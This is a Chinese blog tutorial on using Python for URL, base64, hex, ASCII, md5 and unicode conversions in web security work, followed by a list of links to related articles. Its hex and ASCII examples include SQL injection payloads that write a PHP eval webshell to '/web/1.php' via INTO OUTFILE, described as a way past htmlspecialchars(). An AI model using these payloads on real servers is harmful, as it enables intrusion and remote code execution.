python妙用之编码的转换详解


Posted in Python onApril 21, 2017

前言

记得刚入门那个时候,自己处理编码转换问题往往是“百度:url解码、base64加密、hex……”,或者是使用一款叫做“小葵多功能转换工具”的软件,再后来直接上Burpsuite的decoder功能,感觉用的还挺好的。不过,也遇到些问题:在线转换效率低(搜索占去了2/3的时间)、两款工具存在一些小问题,比如burp中涉及中文往往显示乱码。

python妙用之编码的转换详解

python妙用之编码的转换详解

直到使用python来作为我日常编码转换工具……

开启py转换之旅

url编码

url编码是一种浏览器用来打包表单输入的格式.可谓是一名作为web人员最熟悉的一种编码方式了。

>>> from urllib import *
>>> quote("union select null,null,null")
'union%20select%20null%2Cnull%2Cnull'
>>> unquote("union%20select%20null%2Cnull%2Cnull")
'union select null,null,null'
>>> urlencode({'x':'2333','y':'666'})
'y=666&x=2333'

Base64

Base64常常用作网页表单和HTTP传输的一些参数,也常用于邮件协议传输用户信息等。

>>> import base64
>>> base64.b64encode("admin")
'YWRtaW4='
>>> base64.b64decode('YWRtaW4=')
'admin'

记得有次ctf比赛中考到了base32解密,一般网站不提供在线解密,一时之间貌似没有办法继续下去。不过如果你使用python的话会像上边解密base64一样简单,只需要将函数改变下:

>>> import base64
>>> base64.b32encode('jjjjj')
'NJVGU2TK'
>>> base64.b32decode('NJVGU2TK')
'jjjjj'

Hex

十六进制编码也是web application中常见的一种编码方案。作为一名web安全人员,我们心知肚明的是,MySQL注入可以使用hex绕过htmlspecialchars()函数从而写入webshell。

比如:

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'

下面是python实现hex加解密的方法:

>>> '<?php @eval($_POST[a]); ?>'.encode('hex')
'3c3f70687020406576616c28245f504f53545b615d293b203f3e'
>>>
>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')
<?php @eval($_POST[a]); ?>
>>>

ASCii

MySQL中的char()函数则是转换ascii码的,正因如此,也可以使用这个特性来绕过htmlspecialchars()函数。

比如:

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'

使用python将字符串转换ascii很简单,但是逆转换的话需要需要点小操作:

>>> map(ord, "<?php phpinfo() ?>")
[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

>>> print chr(112)
p

>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print ''.join(map(chr,l)) #感谢pcat表哥指出的方法
<?php phpinfo() ?>

Md5

md5在web安全界可以说是人尽皆知了,以他的不可逆性,大多数网站存储用户密码等关键数据时常常使用md5加密。有的时候我们提交payload需要md5加密,这个时候用下面的方法就可以轻松实现。当然解密的话推荐去cmd5。

>>> from hashlib import md5
>>> m = md5()
>>> m.update('this is a secret')
>>> m.hexdigest()
'7dbbcee180ba4d456e4aa1cfbdad9c7b'

>>> m.hexdigest()[8:-8]
'80ba4d456e4aa1cf'
>>>

Unicode转中文

unicode转换中文,很多情况下都能遇到。尤其是在做渗透测试的时候。用burp的话会存在中文乱码的问题,在python下实现非常简单。

>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"
你需要重新登陆

总结

python实际上在实际使用中非常方便,编码转换只是其中一个例子。文中提到的编码转换皆为笔者日常积累,如果有没有涉及到的地方,欢迎评论补充。好了,以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对三水点靠木的支持。

Python 相关文章推荐
python实现用户登录系统
May 21 Python
使用Python脚本和ADB命令实现卸载App
Feb 10 Python
Python使用回溯法子集树模板解决迷宫问题示例
Sep 01 Python
Python 闭包的使用方法
Sep 07 Python
Python使用cx_Oracle模块操作Oracle数据库详解
May 07 Python
对Python的zip函数妙用,旋转矩阵详解
Dec 13 Python
Python实现的在特定目录下导入模块功能分析
Feb 11 Python
Python unittest工作原理和使用过程解析
Feb 24 Python
python能在浏览器能运行吗
Jun 17 Python
pytorch 如何使用batch训练lstm网络
May 28 Python
Python Pandas pandas.read_sql_query函数实例用法分析
Jun 21 Python
用python基于appium模块开发一个自动收取能量的小助手
Sep 25 Python
简单谈谈Python中的元祖(Tuple)和字典(Dict)
Apr 21 #Python
Python学习笔记之解析json的方法分析
Apr 21 #Python
Python正则抓取网易新闻的方法示例
Apr 21 #Python
Python中shape计算矩阵的方法示例
Apr 21 #Python
Python使用正则表达式抓取网页图片的方法示例
Apr 21 #Python
用python找出那些被“标记”的照片
Apr 20 #Python
python实现12306火车票查询器
Apr 20 #Python
You might like
phpinfo 系统查看参数函数代码
2009/06/05 PHP
javascript 小型动画组件与实现代码
2010/06/02 PHP
php中检查文件或目录是否存在的代码小结
2012/10/22 PHP
php将url地址转化为完整的a标签链接代码(php为url地址添加a标签)
2014/01/17 PHP
PHPExcel读取EXCEL中的图片并保存到本地的方法
2015/02/14 PHP
Zend Framework教程之Application用法实例详解
2016/03/14 PHP
Laravel 5.5 异常处理 &amp; 错误日志的解决
2019/10/17 PHP
thinkphp5实现微信扫码支付
2019/12/23 PHP
laravel开发环境homestead搭建过程详解
2020/07/03 PHP
JavaScript高级程序设计(第3版)学习笔记2 js基础语法
2012/10/11 Javascript
密码强度检测效果实现原理与代码
2013/01/04 Javascript
extjs3 combobox取value和text案例详解
2013/02/06 Javascript
jqGrid日期格式的判断示例代码(开始日期与结束日期)
2013/11/08 Javascript
javascript中加号(+)操作符的一些神奇作用
2014/06/06 Javascript
jQuery实现的纵向下拉菜单实例详解【附demo源码下载】
2016/07/09 Javascript
jQuery实现单击按钮遮罩弹出对话框效果(1)
2017/02/20 Javascript
详解从Vue.js源码看异步更新DOM策略及nextTick
2017/10/11 Javascript
jQuery+koa2实现简单的Ajax请求的示例
2018/03/06 jQuery
实例讲解Vue.js中router传参
2018/04/22 Javascript
详解使用VUE搭建后台管理系统(vue-cli更新至3.0)
2018/08/22 Javascript
微信小程序开发之左右分栏效果的实例代码
2019/05/20 Javascript
Vue修改项目启动端口号方法
2019/11/07 Javascript
jQuery实现飞机大战小游戏
2020/07/05 jQuery
[00:32]2018DOTA2亚洲邀请赛EG出场
2018/04/03 DOTA
python按照多个字符对字符串进行分割的方法
2015/03/17 Python
python使用str &amp; repr转换字符串
2016/10/13 Python
python去除空格和换行符的实现方法(推荐)
2017/01/04 Python
详解Python安装tesserocr遇到的各种问题及解决办法
2019/03/07 Python
Python的numpy库下的几个小函数的用法(小结)
2019/07/12 Python
Python 实现网课实时监控自动签到、打卡功能
2020/03/12 Python
html5 CSS过度-webkit-transition使用介绍
2013/07/02 HTML / CSS
Boden美国官网:英伦原创时装品牌
2017/07/03 全球购物
英国文具、办公用品和科技商店:Ryman
2018/09/27 全球购物
学生安全承诺书
2014/05/22 职场文书
党在我心中演讲稿
2014/09/02 职场文书
高三生物教学反思
2016/02/22 职场文书